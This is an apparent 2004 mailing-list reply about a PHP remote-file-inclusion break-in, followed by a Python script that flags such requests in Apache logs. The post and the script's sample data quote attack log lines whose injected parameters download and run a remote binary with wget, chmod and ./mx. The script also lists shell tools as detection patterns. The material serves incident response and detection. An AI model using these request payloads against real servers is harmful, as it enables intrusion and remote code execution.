My website was hacked! (fwd)

Steve Seremeth blu_discuss at seremeth.com
Wed Nov 24 23:06:33 EST 2004


David Kramer wrote:

>Anything else I should try?
>
>Should I panic more than I am?  Right now I feel strongly this was a 
>benign "stupid Apache tricks" thing, and I need to find the hole and close 
>it, but no need to nuke the server and start over.
>
To add to my off-list comments...

I'm a little hazy on the details as this was a while ago, but here's 
what we found after the hacker had exploited a _known_ gaping hole in a 
php app one of our users was running:
* They had dropped a false shell into /var/tmp that ran under the apache 
user -- I think it listened on some funny port - and we discovered it 
when we went to bounce apache and got some weird message
* They tried to compile an irc bot (go figure)
* Apache logs had the evidence:
Several instances of this:
./log/access_log:203.130.222.150 - - [12/Jan/2004:19:29:10 -0800] "GET /pm_inc.php?pm_path=http://www.delhill.net/_borders/&cahyo=cd%20/var/tmp%20;%20wget%20exploiter.info/tools/mx HTTP/1.1" 200 188 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"

Nasty.

I ran chkrootkit and it didn't find anything.  I also did checksums 
against a lot of local binaries compared to known good ones to make sure 
they were the originals.
 
I bet you are right that it's an apache-only thing, but I would be 
_really_ sure.  I would also leave apache (and perhaps other daemons as 
well) down until you are sure you found the problem.  Our offender came 
back once or twice more unsuccessfully.
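The log line quoted in the post carries two separate indicators: a parameter whose value is a remote URL (the remote-file-inclusion vector into the vulnerable PHP script) and a second parameter carrying a shell command to be run once the attacker's code is included. The script below, added here as an example and not part of the original post, pulls both out of an Apache "combined" format access log so repeat visits from the same source stand out. The log format regex, the indicator patterns, and the two extra sample lines (one benign, one follow-up hit) are assumptions constructed for this example; the first sample line is the one from the post, rejoined onto one line with grep's filename prefix dropped.

```python
"""Flag Apache access-log requests carrying remote-file-inclusion (RFI)
and shell-command-injection indicators.

Added example; not code from the original post. The Apache "combined"
log format and the indicator patterns below are assumptions.
"""
import re
from urllib.parse import unquote_plus

# Apache combined format up to the status/bytes fields; referer and
# user-agent follow but are not needed for this check.
COMBINED_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)(?: [^"]+)?" '
    r'(?P<status>\d{3}) (?P<bytes>\S+)'
)

# A parameter value that is itself a URL: the classic RFI fingerprint
# (the vulnerable include() fetches attacker-hosted PHP from that URL).
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

# Shell command separators, or the download/execute tools attackers chain
# behind them (assumed indicator list; extend to taste).
SHELL_RE = re.compile(r'[;|`]|\$\(|\b(?:wget|curl|chmod|perl)\b', re.IGNORECASE)


def split_query(query):
    """Split 'a=1&b=2' into decoded (name, value) pairs. Only '&' separates
    pairs, so a raw ';' inside a value (part of the injected shell command)
    stays attached to its parameter instead of being treated as a separator."""
    pairs = []
    for part in query.split('&'):
        if part:
            name, _, value = part.partition('=')
            pairs.append((unquote_plus(name), unquote_plus(value)))
    return pairs


def analyse_line(line):
    """Return [(indicator, param, decoded_value), ...] for one log line.
    An empty list means nothing suspicious; None means the line did not parse."""
    m = COMBINED_RE.match(line)
    if not m:
        return None
    _, _, query = m.group('target').partition('?')
    findings = []
    for name, value in split_query(query):
        if REMOTE_URL_RE.match(value):
            findings.append(('rfi', name, value))
        if SHELL_RE.search(value):
            findings.append(('cmd', name, value))
    return findings


def scan(lines):
    """Run analyse_line over a log and return one dict per suspicious request,
    with the HTTP status so a 200 (payload served) stands out from a 404."""
    hits = []
    for line in lines:
        findings = analyse_line(line)
        if findings:
            m = COMBINED_RE.match(line)
            hits.append({'host': m.group('host'), 'time': m.group('time'),
                         'status': m.group('status'), 'findings': findings})
    return hits


# Sample input. The first line is the one quoted in the post, rejoined onto
# one line with grep's "./log/access_log:" prefix removed; the other two are
# constructed for this example (one benign request, one follow-up hit).
SAMPLE_LOG = [
    '203.130.222.150 - - [12/Jan/2004:19:29:10 -0800] "GET /pm_inc.php?pm_path=http://www.delhill.net/_borders/&cahyo=cd%20/var/tmp%20;%20wget%20exploiter.info/tools/mx HTTP/1.1" 200 188 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"',
    '10.0.0.5 - - [12/Jan/2004:19:30:00 -0800] "GET /index.php?page=home&id=42 HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '203.130.222.150 - - [12/Jan/2004:19:31:07 -0800] "GET /pm_inc.php?pm_path=http://www.delhill.net/_borders/&cahyo=cd%20/var/tmp;chmod%20%2Bx%20mx;./mx HTTP/1.1" 200 188 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"',
]

if __name__ == '__main__':
    for hit in scan(SAMPLE_LOG):
        print(hit['host'], hit['time'], hit['status'])
        for kind, param, value in hit['findings']:
            print('   ', kind, param, '=', value)
```

Run it against a real log with `scan(open('access_log'))`; a status of 200 on a flagged request means the include succeeded and the host should be treated as compromised, which is the point at which the "is it Apache-only" question in the post needs an answer before anything is brought back up.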